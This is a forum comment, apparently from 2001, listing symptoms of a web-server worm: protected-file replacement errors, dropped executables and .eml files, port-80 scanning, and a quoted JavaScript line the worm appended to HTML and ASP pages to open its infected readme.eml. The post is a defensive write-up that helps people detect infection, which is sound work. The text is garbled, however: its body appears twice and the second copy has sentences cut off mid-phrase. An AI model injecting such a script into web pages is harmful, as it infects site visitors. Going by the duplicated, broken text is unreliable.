Comment Some symptoms (Score 1) 1163
- Windows File Protection errors:
At around the time the virus hit, Windows 2000 event log reported file replacement errors for these files:
"File replacement was attempted on the protected system file ... This file was restored to the original version to maintain system stability":
d:\program files\microsoft frontpage\version3.0\bin\fp98swin.exe
d:\program files\common files\microsoft shared\web server extensions\40\bin\tcptest.exe
d:\program files\common files\microsoft shared\msinfo\msinfo32.exe
d:\program files\outlook express\wabmig.exe
d:\program files\outlook express\wab.exe
d:\program files\windows nt\pinball\pinball.exe
d:\winnt\system32\mspaint.exe
d:\program files\outlook express\msimn.exe
d:\program files\internet explorer\connection wizard\isignup.exe
d:\program files\internet explorer\connection wizard\inetwiz.exe
d:\winnt\system32\inetsrv\inetmgr.exe
d:\program files\internet explorer\connection wizard\icwconn2.exe
d:\program files\internet explorer\connection wizard\icwconn1.exe
d:\program files\windows nt\dialer.exe
d:\program files\netmeeting\conf.exe
d:\winnt\system32\cmmgr32.exe
The virus exe references this registry string, so I guess its possible this is where its grabbing some of these paths:
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
- IE crashing on NT:
On NT SP4, IE crashes whenever I try to load it (Dr Watson is triggered). The same crash appears right after logging in as well. If I cancel Watson, IE will continue to run, but the system is very slow. IE also crashed on my Win 2k box, but it works now after I cleaned up some of the virus files.
- It seems the virus created these files, which I deleted:
WINNT\mmc.exe - 56 KB
(icon is the same as for IE html pages)
WINNT\Admin.dll - 56 KB
Admin.dll also showed up in a few IIS directories.
- The bogus mmc.exe process had a couple instances running when I first discovered the virus. I had to reboot to kill them. At the same time, netstat was reporting tons of connections to port 80 of various hosts as the virus tried to spread.
- Lots of mep* files found in the WINNT directory on my NT box. The .tmp files seem to contain the mime attachment data for readme.exe:
mepDF.tmp - 78 KB
mepEO.tmp - 78 KB
mepE3.tmp - 78 KB
mep181.tmp - 78 KB
mep183.tmp - 78 KB
mepE2.tmp.exe - 56 KB
mepE4.tmp.exe - 56 KB
mepE5.tmp.exe = 56 KB
A few more similar looking files.
At one point I noticed one of the mep*.exe processes was running.
- On my Win2K box, these files appeared in hundreds of directories (fewer files found on my NT box - probably something to do with how my virtual IIS dirs are set up):
readme.eml
desktop.eml
sample.eml
desktop.nws (fewer of these than the others)
- A line of javascript code was appended to some of the html and asp files in my virtual IIS dirs:
<html><script language="JavaScript">window.open ("readme.eml", null, "resizable=no,top=6000,left=6000") </script></html>
- One of the virus .exe files contains the string:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
- My suggestion is to do a full search for any of these files and check them out. Note the modification dates.
At around the time the virus hit, Windows 2000 event log reported file replacement errors for these files:
"File replacement was attempted on the protected system file
d:\program files\microsoft frontpage\version3.0\bin\fp98swin.exe
d:\program files\common files\microsoft shared\web server extensions\40\bin\tcptest.exe
d:\program files\common files\microsoft shared\msinfo\msinfo32.exe
d:\program files\outlook express\wabmig.exe
d:\program files\outlook express\wab.exe
d:\program files\windows nt\pinball\pinball.exe
d:\winnt\system32\mspaint.exe
d:\program files\outlook express\msimn.exe
d:\program files\internet explorer\connection wizard\isignup.exe
d:\program files\internet explorer\connection wizard\inetwiz.exe
d:\winnt\system32\inetsrv\inetmgr.exe
d:\program files\internet explorer\connection wizard\icwconn2.exe
d:\program files\internet explorer\connection wizard\icwconn1.exe
d:\program files\windows nt\dialer.exe
d:\program files\netmeeting\conf.exe
d:\winnt\system32\cmmgr32.exe
The virus exe references this registry string, so I guess its possible this is where its grabbing some of these paths:
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
- IE crashing on NT:
On NT SP4, IE crashes whenever I try to load it (Dr Watson is triggered). The same crash appears right after logging in as well. If I cancel Watson, IE will continue to run, but the system is very slow. IE also crashed on my Win 2k box, but it works now after I cleaned up some of the virus files.
- It seems the virus created these files, which I deleted:
WINNT\mmc.exe - 56 KB
(icon is the same as for IE html pages)
WINNT\Admin.dll - 56 KB
Admin.dll also showed up in a few IIS directories.
- The bogus mmc.exe process had a couple instances running when I first discovered the virus. I had to reboot to kill them. At the same time, netstat was reporting tons of connections to port 80 of various hosts as the virus tried to spread.
- Lots of mep* files found in the WINNT directory on my NT box. The
mepDF.tmp - 78 KB
mepEO.tmp - 78 KB
mepE3.tmp - 78 KB
mep181.tmp - 78 KB
mep183.tmp - 78 KB
mepE2.tmp.exe - 56 KB
mepE4.tmp.exe - 56 KB
mepE5.tmp.exe = 56 KB
A few more similar looking files.
At one point I noticed one of the mep*.exe processes was running.
- On my Win2K box, these files appeared in hundreds of directories (fewer files found on my NT box - probably something to do with how my virtual IIS dirs are set up):
readme.eml
desktop.eml
sample.eml
desktop.nws (fewer of these than the others)
- A line of javascript code was appended to some of the html and asp files in my virtual IIS dirs:
<html><script language="JavaScript">window.open ("readme.eml", null, "resizable=no,top=6000,left=6000") </script></html>
- One of the virus
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
- My suggestion is to do a full search for any of these files and check them out. Note the modification dates.
